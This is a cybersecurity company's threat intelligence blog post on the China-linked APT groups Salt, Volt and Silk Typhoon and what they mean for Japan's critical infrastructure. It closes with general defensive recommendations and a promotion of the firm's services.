- Threat Intelligence
- May 21, 2025
China’s APT Threats to Japan’s Critical Infrastructure: Salt, Volt, and Silk Typhoon
What Japan’s defenders must know about China’s cyber espionage and infrastructure sabotage campaigns
China’s Cyber Warfare Strategy and APT Evolution
Cyber warfare is evolving rapidly, with Advanced Persistent Threats (APTs) becoming more sophisticated, stealthy, and destructive. Among the most concerning in recent years are three China-linked APT groups: Salt Typhoon, Volt Typhoon, and Silk Typhoon. Each works with distinct tactics and goals, yet collectively, these groups signal a broader shift in how nation-states conduct cyber operations.
In this post, we’ll analyse how these groups operate, what the activities reveal about China’s long-term cyber strategy, and how defenders can prepare for the next wave of cyber warfare.
APT Group Profiles: Salt, Volt, and Silk Typhoon Explained
Salt Typhoon: China’s Cyber Espionage Specialist
Salt Typhoon focuses on cyber espionage, targeting Western enterprises such as technology, defence, and telecommunications. It specialises in exploiting enterprise software vulnerabilities to gain long-term access to sensitive intellectual property and corporate secrets.
Volt Typhoon: The Stealthy Infrastructure Saboteur
Volt Typhoon, on the other hand, has a different mission – covertly infiltrating critical infrastructure to pre-position themselves for disruptive or destructive attacks. Unlike traditional APTs that rely on malware, Volt Typhoon utilises living-off-the-land (LOL) techniques, making detection much harder.
Silk Typhoon: APT Meets Cyber Crime
Silk Typhoon is a unique hybrid. It blends state-sponsored cyber espionage with financially motivated cybercrime. While it conducts traditional nation-state intelligence gathering operations, it also engages in financially motivated attacks and targets organisations within the global IT supply chain.
Strategic Implications for Japan’s National Cyber Defence
For cyber threat practitioners, these groups illustrate the shift from espionage to an integrated model of cybercrime, intelligence collection, and operational disruption. Silk Typhoon exemplifies this evolution, seamlessly pivoting between data theft and financially motivated attacks. An attack today may be aimed at intelligence gathering, tomorrow financial extortion or market manipulation. Defenders must break out of siloed thinking—cyber threats are interconnected across economic, corporate, and national security landscapes.
“Stealth is now the norm. Sophisticated threat actors are employing living-off-the-land techniques, utilising built-in system tools to evade detection.”
Volt Typhoon’s operations reinforce that cyber warfare is very active. These adversaries are embedding within critical infrastructure, staying undetected for years, pre-positioning themselves for future sabotage. The implications are severe: power grids, logistics, and communications could be compromised long before an attack is detected. Threat intelligence teams must transition from reactive defence to proactive hunting, with the goal of finding persistent, stealthy intrusions before they escalate.
“The notion of a secure perimeter is obsolete—the real threat may already be inside, hidden in plain sight.”
Supply chain exploitation is another growing challenge. Silk Typhoon has refined indirect compromise, targeting third-party vendors to gain access to high-value targets. Even organisations with strong internal security may find themselves breached through a compromised software update or trusted vendor. Robust cyber defence must extend beyond internal networks, focusing also on the threat from supply chain exploitation. Security teams must enforce strict vendor assessments, enhance supply chain security, and demand transparency in software dependencies.
Explore how Japan is shifting from compliance to capability in our post on Active Cyber Defence in Japan.
How to Detect and Defend Against APTs from China
Salt, Volt, and Silk Typhoon are not just isolated APTs—they are a coordinated, long-term strategy by China to blend espionage, infrastructure pre-positioning, and cybercrime for strategic advantage. Their operations signal a shift: cyber-attacks are no longer episodic—they’re part of a sustained influence campaign.
Proactive Defence: Turning Intelligence into Action
As threat analysts, we need to move past reactive posture. Relying on perimeter defences is no longer sufficient—assume compromise and operate accordingly.
- Operationalise threat intelligence—Map IOCs and TTPs from these groups directly to your environment.
- Hunt continuously—Focus on persistence mechanisms, LOLBins, and lateral movement activity.
- Test your IR playbooks—Simulate long-term intrusions and stealthy C2 scenarios in red/blue team exercises.
- Push for visibility—Across endpoints, network, and third-party supply chains. You can’t defend what you can’t see.
The threat is already embedded. The mission now is to detect, contain, and outpace the adversary before they activate.
Explore how AI is transforming security strategies in an earlier post, The Rise of AI-Driven Warfare: Securing Nations and Critical Infrastructure from Emerging Threats.
Is Your Organisation Resilient Enough to Withstand
NCD is uniquely positioned to help governments, critical infrastructure providers, and enterprises prepare for, detect, and respond to these threats before they escalate.
Contact Us Let’s talk about your current level of cyber resilience.
Threat Intelligence Analyst @ Nihon Cyber Defence
Turner brings years of experience with the UK Ministry of Defence and NATO-aligned operations and is an expert in high-stakes operational intelligence.
Cyber Maturity Assessment
Nihon Cyber Defence (NCD) offers comprehensive Cyber Maturity Assessments designed to evaluate an organisations current cyber security capabilities, identify areas for improvement, and develop a strategic roadmap to enhance overall security posture.
Cyber Security Framework (NIST)
National Institute of Standards and Technology
Cyber Assessment Framework (CAF)
National Cyber Security Centre
Explore more of the NCD suite: Cyber Security Consultancy, Protective Services, Network Monitoring & Security Operations, SIEM, Incident Management
